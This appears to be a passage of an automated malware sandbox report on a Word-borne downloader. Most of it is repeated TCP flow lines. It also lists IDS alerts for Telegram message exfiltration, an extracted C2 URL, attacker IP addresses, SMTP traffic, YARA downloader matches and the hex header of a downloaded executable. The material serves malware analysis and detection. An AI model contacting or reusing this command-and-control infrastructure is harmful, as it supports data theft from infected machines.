Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737

Source: winword.exe

Memory has grown: Private usage: 1MB later: 67MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:52796 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:52782 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:52761 -> 149.154.167.220:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://amazonenviro.com/admin/245_Nsltarpncon

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 16.2.npratlsN.pif.2e310000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2b48a8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb8a8ee.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2e490000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214f9a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2b489a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb89a06.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.242f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2ea90000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214fa8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.npratlsN.pif.29aec7e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 4_2_0290E7AC InternetCheckConnectionA,

4_2_0290E7AC

Source: global traffic

TCP traffic: 192.168.2.4:52774 -> 46.151.208.21:587

Source: global traffic

TCP traffic: 192.168.2.4:52741 -> 1.1.1.1:53

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Mon, 13 Jan 2025 01:10:58 GMTAccept-Ranges: bytesETag: "9ca0aa05865db1:0"Server: Microsoft-IIS/8.5Date: Tue, 14 Jan 2025 07:08:10 GMTContent-Length: 1443328Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 22 06 00 00 e0 0f 00 00 00 00 00 70 37 06 00 00 10 00 00 00 40 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 16 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 1e 25 00 00 00 70 07 00 00 26 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 06 00 4c 71 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 a6 06 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 19 06 00 00 10 00 00 00 1a 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 cc 07 00 00 00 30 06 00 00 08 00 00 00 1e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 60 1e 00 00 00 40 06 00 00 20 00 00 00 26 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 b0 36 00 00 00 60 06 00 00 00 00 00 00 46 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 1e 25 00 00 00 a0 06 00 00 26 00 00 00 46 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 34 00 00 00 00 d0 06 00 00 00 00 00 00 6c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 e0 06 00 00 02 00 00 00 6c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 4c 71 00 00 00 f0 06 00 00 72 00 00 00 6e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 00 26 0f 00 00 70 07 00 00 26 0f 00 00 e0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 16 00 00 00 00 00 00 06 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
